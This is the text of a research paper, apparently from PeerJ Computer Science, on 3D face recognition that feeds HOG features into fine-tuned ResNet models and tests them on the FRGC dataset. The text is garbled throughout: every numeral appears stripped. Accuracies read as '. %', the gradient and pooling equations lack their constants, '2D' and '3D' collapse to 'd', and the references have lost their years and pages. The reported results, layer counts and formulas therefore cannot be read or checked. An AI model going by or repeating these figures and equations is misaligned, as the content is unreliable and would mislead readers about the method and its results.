/peerj-cs. from . to . , the classification accuracy increased from . % to . %; while, the accuracy dropped to . % when the learning rate rose to . . furthermore, using a × filter increased the classification accuracy significantly to . % with a learning rate of . . in a follow-up study, sharma & shaik ( ) have proposed a new methodology for face recognition with a higher accuracy of approximately %. they suggested a customized cnn model, including an input layer, a convolutional layer, a pooling layer, and a fully connected layer. they use the above method to recognize the d image with resolution of × . according to results, their face recognition system takes twenty epochs for converging the learning rate, which includes the training rate and the testing rate. especially, the training losses can be decreased to about before the th epoch. different methods have been proposed to recognize d face images. kim et al. ( ) has developed the vggnet neural network for dealing with d face data. the most representative features of face are extracted from the fine-tuned vggnet model. the model includes two convolution layers and two fully connected layers with random initial weights, using the last fully connected layer with a softmax layer to accommodate the different sizes of the input images. the fine-tuned vggnet model achieved an accuracy of . % in the experiment. nagi et al. ( ) has developed the face alignment algorithm based on the methods of geometric invariants, local binary pattern (lbp), and k-nearest neighbor (knn). the face landmarks model ( key points) is used to detect the human face, and the lbp method is used to crop the d face areas. the method of knn calculates the distance between each input data and the training sample, obtaining the k images closest to the training sample. finally, proposed statistical methods are used to classify and recognize the images. the results show that the model can reach . % in the recognition rate; however, it declined to % as the number of datasets increases. soltanpour & jonathan wu ( ) uses normal vector to study d face recognition. she proposed that more detailed distinct information can be extracted from the d facial image by using high-order lndp method. by estimating the three components of normal vectors in x, y and z channels, three normal component images are extracted. the score-level fusion of three high-order lndp x, lndp y and lndp z are used to improve the recognition performance. experiments use sift-based strategy for matching the face features. the results of this study indicate that fusion lndp xyz outperforms descriptors, effectively improving the d recognition rate to . %. the study by kamencay et al. ( ) offers probably the most comprehensive empirical analysis of d face recognition. in an attempt to build practical and robust face recognition systems, he proposed three main types of layers for cnn architectures: the convolution layer, the pooling layer, and the fully connected layer. he also proposed three machine learning methods for face recognition, such as principal component analysis ( . %), local binary patterns histograms ( . %), and knn ( . %). the proposed customized cnn for d face recognition outperforms the above machine learning methods, which reaches the average accuracy of approximately . %. the highest accuracy is . % when % of the data was used for training model. zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. recent advances in hog feature extraction methods have facilitated investigation of face recognition. in singh & chhabra’s ( ) article, she suggests that hog features can be used in the recognition system for improving the efficiency and the processing speed. the function of hog features can capture the edge features that are invariant to the rotation and light. owing to the fact that both texture and edge information is important for face representation. hog features and svm classifier-based face recognition algorithm is presented in santosh dadi & mohan pillutla’s ( ) research. his proposed model extracts the hog features of the face from the image, these features can be given to any classifier. in the testing stage, the test image is obtained and fed to the svm classifier, which is a non-probabilistic binary classifier and looks for optimal hyperplane as a decision function, for classification. the results show that this method has better classification accuracy for the test data set, about %. in addition, compared to the method using standard eigen feature and pca algorithm as a baseline, svm also possesses an improved face recognition rate of . %. to investigate the effect of utilizing hog features in the cnn model, (ahamed, alam & manirul islam, ) developed cnn learning models that using the hog features as input data to the training model. his model contains of several layers and each layer is repeatedly used, finally a deep neural network is constructed. in order to evaluate the proposed model, a set of images with images are generated for testing the model performance. however, it leads to a low generalization ability since the data set trained by the model is small. the result shows that the accuracy is approximately % by using the constructed model. in the experiment, we used the latest residual deep neural network (resnet) and the fine-tuning method (he et al., ). our preprocessing method uses hog features of d face texture, different layers of resnet are created during the experiment and whether decision making in face recognition process can be improved or not is investigated. we evaluated these approaches in the context of the same d face-recognition experiment as in (kamencay et al., ), a more challenging task than the face identification task used in (ahamed, alam & manirul islam, ). materials & methods the diversity of face poses raises difficulties for d face recognition. by detecting key points on the face, such as the tip of the nose, the corners of the mouth, and the corners of the eyes, the face image in an arbitrary pose can be converted into a frontal face image by affine transformation, after which the face features can be extracted, and an identification is performed. this approach shows that after alignment the features can be extracted with greater success, and the recognition accuracy is thus greatly improved. a schematic diagram of face detection and face alignment is shown in fig. . there are three steps for preprocessing of d face recognition: . d face detection, . d face alignment. . d human face feature extraction. the first two phases are implemented by using the open-source tool provided by the dlib, which can monitor the key points of the face real time to obtain the position and posture of the face. then we developed a module for extracting the hog features based on d face texture images. key points of the face zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the pre-processing of d face textures. full-size doi: . /peerjcs. /fig- are detected using the conditional local neural fields algorithm (baltrusaitis, robinson & morency, ; simonyan & zisserman, ). facial detection and landmarks selection all d images need to be processed before the processing of recognition in order to reduce image noise and redundancy, as shown in fig. . the first step of d face recognition is face detection and alignment. we use pre-trained facial landmark detector from the dlib library, which is used to estimate and predict the location of sixty-eight key points on the human face. based on the geometric invariant method, these facial points are marked on the d facial images (baltrusaitis, robinson & morency, ; jourabloo & liu ; song et al., ), the subgraphs of a and c is the original d images, and the key point distributions are indicated as b and d in fig. on the right side. these points, including the dominant facial features, such as the tip of the nose, the corners of the mouth, and the corners of the eyes, which are used for further feature extraction and geometric calculations in the recognition stage. the features of histogram of oriented gradient in the feature extraction process, we usually try to find the invariant properties and characteristics so that the extraction results do not change significantly due to the specified conditions, this means that the goal of recognition is to find useful discriminative information not the position and size. regardless of the different changes in the shape and zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure facial landmarks ( key points) of face recognition grand challenge version (frgc v . ). the subgraphs of a and c show that the camera takes images of the subjects from different angles. note that face coordinates are located by using green key points in the subgraphs of b and d. full-size doi: . /peerjcs. /fig- appearance of the image, we should find reliable and robust discriminative information for improve the recognition rate. in the field of image processing and computer vision, texture analysis and extraction have a rich history. a method called the histogram of oriented gradient (hog) has received extensive attention. the core idea of the hog method is to describe the texture of the detected object by the gradient or distribution of edge directions. its function is to capture the edge or gradient structure from the image, which is characteristic for the representation of local texture. the benefit of this feature is relatively less affected by the appearance and shape. essentially, it forms a template and uses learning models to effectively promote recognition. the hog descriptor can extract important features from d images (santosh dadi & mohan pillutla, ; kumar, happy & routray, ). it captures the local texture information well and has good invariance to geometric and optical changes. firstly, the target image is divided into small connected regions, which call the cell units. then, the gradient or edge direction of each pixel in the cell unit are acquired. finally, the histograms can be combined to form a feature descriptor. in this section, the hog feature is used as a means of feature extraction in the process of recognition, the purpose is to combine the discriminative d face feature in the recognition phase, the specific implementation steps are as follows. ( ) color and gamma normalization to reduce the influence of lighting factors, the entire image needs to be normalized in the first step. a compressing process that can effectively reduce shadows, colors and illumination variations of the image, because this information did greatly increase code complexity and demanded the higher performance of processor. at the same time, the zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. gray image is normalized by gamma formula. by smoothing part of noises, the influence of local strong light on gradient calculation is reduced. the γ is the symbol of gamma and its value is . the formula of gamma compression eq. ( ) is shown below. i(x,y)= i(x,y)γ ( ) ( ) gradient computation the gradient value of each pixel position is calculated in this step. the derivation operation can capture contours, human shadows, and some texture information, which further weakens the influence of illumination. in the operation of computing image gradient, the gradient direction is key to hog algorithm. the function of h is used for calculating of histogram of oriented gradient. each pixel point of the transverse gradient gx(x,y) and the longitudinal gradient of the gy ( x,y ) is calculated. it defined as eqs. ( ) and ( ). gx(x,y)=h(x+ ,y)−h(x− ,y) ( ) gy(x,y)=h(x,y+ )−h(x,y− ) ( ) ( ) creating the orientation histograms the algorithm needs to finish some operations that calculating the direction gradient of the smallest interval. at the beginning, the d image is divided into several intervals with different sizes. starting from the smallest interval, the gradient direction of all the pixels are contained in each interval, which are weighted by the magnitude. the gradient direction with the largest value represents the gradient direction in the current interval. finally, the gradient magnitude g ( x,y ) of each pixel point is calculated according to eq. ( ). g(x,y)=[gx(x,y) +gy(x,y) ] / ( ) furthermore, the specific operation in the equation above is that the g(x,y)ranges from − ◦ to ◦ . vectors can be evenly divided into nine intervals because each interval is ◦ . this means that nine intervals consist of a total of nine feature vectors in a cell. four cells can form a block, so each block includes feature vectors. in this way, the feature vectors of all cells in a block are concatenated to form the hog features. ( ) computing the directional gradient histogram in the final step of the merging process, the algorithm uses weighted voting to combine the order of all blocks from smallest to largest. in some cases, the algorithm eliminates some detailed features, which are represented by the small amplitude gradient in the intervals. the rest of the blocks are merged into a maximum gradient pattern, in which contains the important representative features in the d images. gradient direction a(x,y) of the pixel point are calculated according to eq. ( ). α(x,y)= tan(− )[gy(x,y)/gx(x,y)] ( ) ( ) creating the orientation histograms after completing above works, the algorithm generated an orientation histogram for the input d face image. in this experiment, we make the pixel of × constitute a zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the processing of hog feature extraction. (a) original d face image (b) input d face im- age; (c) hog feature extraction. full-size doi: . /peerjcs. /fig- block in an image with × image, the stride of scanning window is × , then there are scanning windows in the horizontal and vertical directions in a d texture image. therefore, each d texture image ( × × ) has , dimensional vectors that can form a complete edge orientation histogram. after the preprocessing, the face image with extracted hog features of d textures is input into our fine-tuned resnet classification model. the information contained in the original image is compressed and adjusted, which greatly improves the performance of the subsequent feature extraction network in resnet neural network. finally, the whole processing of hog feature extraction for d face image is shown in figs. a, b and c. we also demonstrate generation of hog feature vectors for specific person with different expression, scenarios and various illumination changes. the images based on hog features extraction are shown from the figs. f to j, which are separately correspond to the reprocessing aligned images from figs. a– e. the architecture of resnet neural networks convolutional neural networks with multiple layers have several advantages in the research of image classification. the deep network uses a form of end-to-end neural network that automatically integrates the low, medium, and high-level features, and then transmits all of these features to the classifier, extracting different depth features by stacking layers with different depths. another benefit of the cnn network is that the convolutional layer can zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the hog features of various d face images. the subject images (a, b, c, d, and e) were taken under the different conditions of illuminations, expressions, sexes, and ages. depending on the pa- rameters in the hog calculation process, the experimental results ensure that the acquired images (f, g, h, i, and j) reveal the discriminative information related to the texture of the original face images. full-size doi: . /peerjcs. /fig- retain local spatial patterns which may be appropriate for image related tasks (zeiler & fergus, ). recent research has shown that the depth of the cnn network is critical to model performance (szegedy et al., ; cheng et al., ). the results of their studies show that the deep convolutional neural network achieves superior performance and significant improvements. in general, the deeper the neural network is, the worse the recognition performance will be. one major issue in early d face recognition research is caused by the use of an error back-propagation algorithm (lawrence & lee giles, ), which includes the weight coefficient, the derivative of the activation function, and the activation value in the partial derivative. when the number of layers is large, these values are multiplied, easily leading to the vanishing gradient and exploding gradient problems (pascanu, mikolov & bengio, ; hanin, ). therefore, it is difficult to ensure high-accuracy in the case of growth of d face data. in the paper by he et al. ( ), he proposed a theory of deep residual learning, which adopted an approach of shortcut connection to avoid the issues mentioned above. the resnet architecture for a -layer network (a) and a residual block (b) are shown in fig. above. a residual block with a connections layer can skip a specific layer in the network. the advantages of short connections are that it can reduce the problem of gradient disappearance, thus making the network converge faster and reducing parameters. resnet- also uses the batch normalization operation between each convolution and activation. it allows the researcher to build increasingly deep networks, which have high recognition abilities. the fine-tuned resnet neural network model in deep neural networks, the function of the first layer of training on images is similar to the gabor filters and color spots operations. first-layer features are not used for specific zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the architecture of resnet model. full-size doi: . /peerjcs. /fig- data sets or specific tasks but for general ones, because they are applicable to common data sets and tasks. image features are eventually transmitted from general to specific by the last layer of the network (yosinski et al., ). in the big data scenario, we introduce the fine-tuning method in the resnet neural network, which can greatly shorten the training time, efficiently improve the training loss, and have a stronger generalization ability for getting a good result. ( ) fine-tuning method the fine-tuning method can be used to flexibly adjust the architecture of the resnet model in this d face recognition task (jung et al., ). in our experiment, four pooling layers with the adaptive average pooling method have been reconstructed. by using the new architecture, it makes the input training data adaptive to the fine-tuned resnet model, and the computational complexity of the model is reduced. a softmax layer is created after the fully connected layer to implement the target data classification task of this experiment. ( ) rectifier linear unit the rectifier linear unit (relu) is an important activation function in the resnet structure, which can overcome the problem of gradient disappearance and speed up the time of training (fred & agarap, ). a relu function maps the input value x to if it is negative, and keeps its value unchanged if it is positive, the main relu calculation zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the fine-tuned resnet neural network. full-size doi: . /peerjcs. /fig- expression (eq. ( )) is shown below. frelu(x)=max( ,x) ( ) the convolutional neural network architecture is mainly followed with a combination of all the methods described above. the architecture starts from the input layer of training images and is followed by the convolution layer with the optimum weight and bias for the feature layer. in order to reduce the internal covariate shift (ioffe & szegedy, ) in the deep neural network, the batch normalization algorithm is also added to each convolutional layer to perform the operations of normal normalization and affine transformation on the input of each layer. finally, our fine-tuned resnet model were constructed with the proposed method, and the parameters of each convolutional layer are represented in fig. . in this fine-tuned resnet model, the layer of adaptive average pooling emphasizes the down-sampling of the overall feature information, its purpose is to reduce the dimension of the feature and retain the effective information, it can integrate features in the feature maps from multiple convolutional layers and pooling layers so that the integrity of the information in this dimension can be more reflected. through this process, both high- dimensional features and confidence scores can be obtained from each classification. the final full connection layer is used to synthesize the features extracted from the adaptive zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. average pooling, it can output the probability distribution by using the softmax regression method, which can be divided into more than , classifications for any tasks, and the value of this parameter was set to in our experiment. in the above structure, adam function is used as an alternative to the traditional stochastic gradient descent (sgd) optimization algorithm which can iteratively update the weights based on the training data mainly to optimize the neural network and make the training faster. datasets this research received the approval from the university of notre dame (henceforth, und), and the dataset of face recognition grand challenge version (frgc-v ) in january . this experiment was performed on frgc-v (flynn, ), which is a large number standard face image dataset containing over , high-resolution d and d face images, which divided into training and validation partitions in a laboratory setting. training partition is designed for training algorithms, and validation partitions is used to evaluate the performance of a method in a laboratory environment. all the images were captured by a minolta vivid / series scanner. the datasets used belong to experiment of frgc-v . the experimental d face dataset includes , images of people with different lighting and facial expressions the aim of this dataset is to test the ability to run experiments on large datasets (phillips et al., ). graphics processing unit the efficient parallel computing of the graphics processing unit (gpu) makes up for the slow training of deep neural networks (chen et al., ). combined with the cuda parallel computing platform, it allows the use of larger training datasets and deeper complex neural networks to extract deeper image features (huang et al., ; singh, paul & dr. arun, ). the model of gpu used in this experiment is nvidia geforce gtx ti. its multi-core architecture includes thousands of stream processors, which can perform vector operations in parallel and achieve several times greater throughput in the application. this significantly shortens the calculation time. gpu has therefore been widely used by scientists in deep network learning. the fig. shows the processing of our proposed framework. the detailed steps of the proposed framework are as follows: first, the image is detected by the key points of facial landmarks method, and the main multi-channel d face regions are extracted, this preprocessing module achieved precision rate of . % and effectively reduces image noise and redundancy from original images, and all images are rescaled to the × × . then, the edges and textures of d face images are enhanced by using the hog method with custom parameters, the hog face feature images based on d textures are obtained, which learned higher discriminative features from d face images. next, fine-tuned deep residual model is proposed by using the hog textures as the input images. finally, we generated custom resnet neural network model. its image input size is adjusted to the pixel of × × , and the structure and quantity of the middle layer in the model are reconstructed, all the operations are performed by using fine-tuning method. zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the fine-tuned resnet feature extraction operation. full-size doi: . /peerjcs. /fig- experiment key point detection and alignment were carried out on the d raw face texture in succession. in the following steps, the dataset applied to the fine-tuned resnet model comprises d face texture with hog features. finally, the proposed model conducted for d face recognition. in this experiment, an implementation of gpu accelerated training is adopted based on python and the cuda architecture, all the hog-featured images were resized of × × pixel in the dataset, the test model of fine-tuned resnet with different depth layers (e.g., layers, layers, layers) were then evaluated. ( ) firstly, a convolution layer in fine-tuned resnet architecture multiplies the × filter with a highlighted area (also × ) of the input feature map, and all the values are summed up to generate one value in the output feature map, as shown in fig. . ( ) after the d data are processed through the first convolution layer, the next layer is max-pooling. the filter window of the max-pooling is moved across the input feature with a step size defined by the stride (the value of stride is in the case of resnet- ). the advantage is that it can reduce errors and preserve more texture information. in the max-pooling, the maximal value is selected from four values in the filter window. the size of the detection region is f × f, with a stride of s, so the output features h’ and w’ are given through the eq. ( ) below. h′=[ h−f +s s ],w′=[ w−f +s s ]. ( ) ( ) the residual block consists of two convolution layers each a × filter and one convolution with a × filter. the × layer mainly reduces and restores dimensions, leaving the × layer a bottleneck with smaller input/output dimensions. two × convolutions effectively reduce the number of convolution parameters and the amount of calculation. the residual block is used for resnet- / / . ( ) the fine-tuned resnet model uses a global average pool and then categorizes d face images at the end of the network through fully connected layers. the global average pooling layer provides faster calculations with more accurate classification and fewer parameters. it serves to sum up all the values from the filter window and then average them, which can reduce errors and retain d background information of the image. zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. ( ) finally, the fully connected layer reassembles the previous local d features into a complete graph through the weight matrix. the classification y is defined as follows: y = f (w t x+b) ( ) ( ) however, having a good neural network model in specified dataset does not necessarily imply that the model is perfect or that it will be reproduced when tested on external data. in order to make sure it is robust, reproducible and unbiased for testing future new datasets under non-ideal conditions, accuracy metrics is adopted to evaluate the fine-tuned resnet model’s performance. the indicator accuracy is a measurement of the correct proportion of image classifications. this study is accurate in its ability to differentiate the d face recognition cases correctly. to estimate the accuracy of tests, the proportion of true positives (tp) and true negatives (tn) in all evaluated cases are calculated in this experiment. mathematically, this can be stated as following. accuracy = tp+tn tp+tn +fp+fn ( ) the sub formula of tp+tn+fp+fn is the total number of observations. moreover, the respective tests of top and top accuracy are used to evaluate the performance of our proposed model. the following hypothesis will be tested: the increasing network depth improves the accuracy of d face recognition. this study contributes to this developing area of research by exploring how different depth of our fine-tuned resnet networks affect the outcome of d recognition. results and discussion tensor board is a data visualization tool that can be used to visualize computational graph structure, provide statistical analysis, and plot the values captured as summaries during the execution of computational graphs. in this research, different types of pre-trained resnet neural network with the same structure but different depths are proposed. as shown in fig. , the three-subgraph shown below are the tensor board graph of linear regression corresponding to the (a), (b), and (c) layers of structure of the resnet neural networks. the d face recognition rates of the three different structural models were recorded objectively in real time use of tensor board. there were times of training and testing in all test cases. according to the results of the resnet testing model, the maximal accuracy was . % for the validation set in the th epoch, which corresponds to the similar accuracy of . % in the th epoch of the resnet model. this accuracy rate is close to . % in the same epoch in the resnet model. the highest accuracies were . % for resnet and . % for resnet . the most accurate indicator of top can be used to further evaluate the performance of the trained resnet model. in the resnet model, the recognition rate fluctuates at first and then becomes regular with the increase of test sets. the accuracy rate was maintained at an average of . % for resnet after the th epoch. the results show that the zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the accuracy rate of different layer numbers in the fine-tuning resnet architecture. the per- formances are shown for the fine-tuned resnet- layer (a), the fine-tuned resnet- model (b), and the fine-tuned resnet- model (c). full-size doi: . /peerjcs. /fig- resnet model has strong generalization ability. the recognition rate reaches its peak of . % in resnet- in the th epoch of the d face recognition experiment. this experiment explores the benefits and effect of different numbers of neural network layer through the fine-tuning method on d face texture recognition research with high accuracy. the fig. has shown that the increasing of layers of fine-tuned resnet neural network model, the proposed framework can improve the accurate through the hog method based on d face textures. to eliminate the effects of interference factors, the d face dataset was processed beforehand ( d face detection, alignment, and hog feature extraction). studies have shown the importance of the fine-tuned convolutional neural network model (resnet) with depth layers that have more highly discriminative features. the model is advantageous in that although the depth is significantly increased, the resnet model is less complex with a higher accuracy rate. the fig. presents the inter-correlations among the three recognition rates of the resnet model with different layers. the d face recognition rate is positively correlated with the number of layers in the resnet model, which is also a principal factor determining the computing time. with qualitative modes of enquiry employed, the experiments show that the proposed method achieves promising results, demonstrating that the resnet- neural network model described in this paper can have a recognition accuracy of . % (top ); compared with the most accurate, the accuracy of the second accurate test was improved by . % (at . %) with the frgc-v datasets. practical results proved the validity of the proposed method in d face recognition. the classification performance of methods applied to the frgc-v dataset seem superior to the seemingly impressive results of published studies utilizing different methods in table (hu et al., ; sharma & shaik, ; soltanpour & jonathan wu, ). in previous researches, custom cnn is a commonly used deep learning algorithm used for d image recognition tasks. firstly, in custom cnn network training, it is necessary to constantly adjust network parameters. the customized parameters such as weights and biases in cnn network results in a very slow convergence of training, and thus greatly increasing the training time and the number of epochs (hu et al., ; sharma & shaik, ). in addition, when the dimension increases with the increase of data volume, it zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table performance comparisons between the proposed method and state-of-the-art methods based on the frgc-v dataset. method features classifier accuracy huiying hu et al. raw image custom cnn- . % s sharma et al. constrained local model custom cnn % sima soltanpour et al. lndp xyz based normal component images sift-based matching method . % proposed methodology hog features resnet layers resnet layers resnet layers and fine-tuning top : . % top : . % top : . % top : . % top : . % top : . % will lead to a curse of dimensionality problems and cause a drop in the performance of the classifier (soltanpour & jonathan wu, ). the fine-tuning method speeds up the convergence and shortens the training period, thus adapting to d processing. the purpose of multi-layer convolution is that the features acquired through one-layer convolution are often local, and the more layers there are, the more global the features will be acquired. then, how to maintain good performance and improve accuracy is a key in larger numbers of d face recognition scene. therefore, fine-tuning depth residual network is proposed based on hog features to effectively solve the problem of large numbers of d face recognition. to the best of our knowledge, our work is to examine a fine-tuned deep residual networks model on the recognition task of frgc-v dataset. to increase accuracy during resnet training, several methods were considered in this paper: ( ) a fine-tuning deep residual network was adopted, taking advantage of its intrinsic features, such as shortcut connection, weights sharing and pooling architectures, and these can be improved through the deepening of the network structure; ( ) the number of layers is carefully designed with smaller filter size to avoid overfitting while there is sufficient capacity for the network to solve the complex large number classification problems (hawkins, ; lawrence & lee giles, ); ( ) data extraction was performed via the hog method at the image preprocessing that contains higher discriminative features in the d images. as a result, the proposed methods were well trained and yielded state-of-the-art classification accuracy. conclusions in this study, in-depth investigations were conducted on end-to-end d face textures recognition. we first review the previous studies on d face recognition and then summarize the critical research questions to be solved. the d face detection and alignment modules are implemented and flexibly applied in d face raw data, which achieves a precision rate of . %. in addition, the detailed steps of the hog extraction pattern were presented. d face images with hog features can significantly minimize the descriptor size for reducing computation load and economizing the memory in the zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. recognition process. we trained the fine-tuned resnet models combined with hog features; the discriminative power of the deeply learned features can highly enhance recognition ability. this study implemented every important subcomponent, which can effectively reduce d image noise and greatly increase the robustness of our proposed recognition system. the experiment showed that the degradation problem was efficiently solved by increasing the number of layers in our fine-tuned resnet neural networks, which improves the recognition rate within a short time, and the accuracy is maintained at a certain level. however, although the performance of the algorithm is unexceptional in practical application, we think that several aspects of the model should still be studied and improved. firstly, although the hog algorithm is advantageous for less calculation time and faster detection speed, when the pose of the d face is changed drastically, there is a target loss in the face image, which leads to low processing efficiency. the d face alignment can be pre-processed with the cnn detection method, and a multi-processing or multithreading method can be used to speed up face alignment, which ensures that the pre-processing module can process data quickly. secondly, the recognition rate may be adversely affected by certain conditions. for instance, the resnet- model exhibited the phenomenon of overfitting, in which the accuracy rate dropped and remained at around % after the th epoch. this phenomenon is caused by two conditions: too few datasets and the excessive complexity of the neural network model. this can be solved by increasing the amount of d face data in the future works via a data augmentation method (perez & wang, ; wong, gatt & stamatescu, ). this also shows that the resnet network has a more powerful data processing capability for a large number of data. overall, the development of large number d face recognition classification system is a challenging work, and there is still a long way to go to apply these theories and methods in large-scale scenes. the results suggest that fine-tuned deep residual networks classification approach based on hog features will be a promising direction to improve d face recognition rate. acknowledgements i am indebted to prof. rahmita wirza o.k. rahmat for assistance with data collection, providing helpful discussions of the d face analyses. i thank fatimah khalid for her help in the depth analysis and comments on the face recognition theory, as well as prof. dr. nurul amelina nasharuddin for fruitful advices. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • siming zheng conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • rahmita wirza o.k. rahmat conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft, checked the logic of this article. • fatimah khalid conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft, checked the fluency of this article. • nurul amelina nasharuddin analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, examined the experimental codes. data availability the following information was supplied regarding data availability: the raw data is available at zheng, siming ( ): -step-frgc -original-dataset-.zip. figshare. figure. doi: . /m .figshare. .v . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ahamed h, alam i, manirul islam md. . hog-cnn based real time face recog- nition. in: proc. international conference on advancement in electrical and electronic engineering (icaeee), vol. p- . – doi . /icaeee. . . bagchi p, bhattacharjee d, nasipuri m. . d face recognition using surface normal. in: tencon . piscataway: ieee doi . /tencon. . . baltrusaitis t, robinson p, morency l-p. . constrained local neural fields for ro- bust facial landmark detection in the wild. in: iccv. doi . /iccvw. . . baltrusaitis t, robinson p, morency l-p. . openface: an open source facial behavior analysis toolkit. in: ieee winter conference on applications of computer vision. doi . /wacv. . . chen z, wang j, he h, huang x. . a fast deep learning system using gpu. in: ieee international symposium on circuits and systems (iscas). piscataway: ieee doi . /iscas. . . cheng z, shi t, cui w, dong y, fang x. . d face recognition based on kinect depth data. in: th international conference on systems and informatics (icsai), vol. . – doi . /icsai. . . flynn p. . face recognition grand challenge biometrics database (v . ) license agree- ment. notre dame: university of notre dame doi . /m .figshare. . zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /icaeee. . http://dx.doi.org/ . /tencon. . http://dx.doi.org/ . /iccvw. . http://dx.doi.org/ . /wacv. . http://dx.doi.org/ . /iscas. . http://dx.doi.org/ . /icsai. . http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /peerj-cs. fred a, agarap m. . deep learning using rectified linear units (relu). arxiv preprint. arxiv: . v : - . hanin b. . which neural net architectures give rise to exploding and vanishing gradients? in: nd conference on neural information processing systems (neurips), vol. . – . hawkins dm. . the problem of overfitting. journal of chemical information and computer sciences : – doi . /ci . he k, zhang x, ren s, sun j. . deep residual learning for image recognition. in: ieee conference on computer vision and pattern recognition (cvpr). piscataway: ieee doi . /cvpr. . . hu h, ali shah sa, bennamoun m, molton m. . d and d face recognition using convolutional neural network. in: tencon . piscataway: ieee doi . /tencon. . . huang y-b, li k, wang g, cao m, li p, zhang y-j. . recognition of convolutional neural network based on cuda technology. arxiv preprint. arxiv: ( ) - . ioffe s, szegedy c. . batch normalization: accelerating deep network training by reducing internal covariate shift. international conference on machine learning : – . jourabloo a, liu x. . pose-invariant d face alignment. in: ieee international con- ference on computer vision (iccv). piscataway: ieee doi . /iccv. . . jung h, lee s, yim j, park s, kim j. . joint fine-tuning in deep neural networks for facial expression recognition. in: ieee international conference on computer vision (iccv). piscataway: ieee doi . /iccv. . . kamencay p, benco m, mizdos t, radil r. . a new method for face recognition using convolutional neural network. digital image processing and computer graphic : – . kim d, hernandez m, choi j, medioni g. . deep d face identification. in: ieee international joint conference on biometrics (ijcb). piscataway: ieee doi . /btas. . . kumar p, happy sl, routray a. . a real-time robust facial expression recognition system using hog features. in: international conference on computing, analytics and security trends. doi . /cast. . . lawrence s, lee giles c. . overfitting and neural networks: conjugate gradient and backpropagation. in: ijcnn. doi . /ijcnn. . . lecun y, boser b, denker js, henderson d, howard re, hubbard w, jackel ld. . backpropagation applied to handwritten zip code recognition. neural computation : – doi . /neco. . . . . maiti s, sangwan d, raheja jl. . expression-invariant d face recognition using k-svd method. applied algorithms : – . min r, choi j, medioni g, dugelay j-l. . real-time d face identification from a depth camera. in: icpr. doi . /crv. . . zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . v : - http://dx.doi.org/ . /ci http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . /tencon. . http://arxiv.org/abs/ ( ) - http://arxiv.org/abs/ ( ) - http://dx.doi.org/ . /iccv. . http://dx.doi.org/ . /iccv. . http://dx.doi.org/ . /btas. . http://dx.doi.org/ . /cast. . http://dx.doi.org/ . /ijcnn. . http://dx.doi.org/ . /neco. . . . http://dx.doi.org/ . /crv. . http://dx.doi.org/ . /peerj-cs. nagi gm, rahmat r, taufik m, khalid f. . multimodal d- d face recognition. international journal of future computer and communication ( ): – doi . /ijfcc. .v . . pabiasz s, starczewski jt, marvuglia a. . som vs fcm vs pca in d face recogni- tion. artificial intelligence and soft computing : – doi . / - - - - _ . pascanu r, mikolov t, bengio y. . understanding the exploding gradient problem. arxiv preprint. arxiv: . v : - . perez l, wang j. . the effectiveness of data augmentation in image classification using deep learning. arxiv preprint. arxiv: ( ) - . phillips pj, flynn pj, scruggs t, bowyer kw, chang j, hoffman k, marques j, min j, worek w. . overview of the face recognition grand challenge. in: cvpr. doi . /cvpr. . . porro-munoz d, silva-mata fj, revilla-eng a, talavera-bustamante i, berretti s. . d face recognition by functional data analysis. progress in pattern recognition, image analysis, computer vision, and applications : – . santosh dadi h, mohan pillutla gk. . improved face recognition rate using hog features and svm classifier. iosr journal of electronics and communication engineering : – doi . / - . sharma s, shaik s. . real time face authentication using convolutional neural net- work. in: international conference on signal processing (icsp) doi . /cp. . . simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. in: rd iapr asian conference on pattern recognition (acpr). doi . /acpr. . . 